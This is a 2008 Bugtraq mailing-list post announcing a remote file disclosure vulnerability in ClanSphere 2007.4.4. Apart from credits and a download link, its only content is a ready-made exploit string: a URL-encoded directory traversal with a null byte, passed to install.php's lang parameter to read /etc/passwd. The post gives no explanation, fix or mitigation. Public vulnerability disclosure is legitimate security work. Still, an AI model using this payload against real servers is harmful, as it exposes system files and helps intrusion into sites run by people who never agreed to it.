
Date: Mon, 28 Jan 2008 00:36:59 +0100
From: p4imi0 <p4imi0@...il.com>
To: bugtraq <bugtraq@...urityfocus.com>
Subject: ClanSphere 2007.4.4 Remote File Disclosure Vulnerability.

--------------------------------------------------------------
ClanSphere 2007.4.4 Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://sourceforge.net/projects/clansphere/
author      : p4imi0
contact     : p4imi0@...il.com
exploit     : install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
thanks to   : str0ke, Cr[]w.
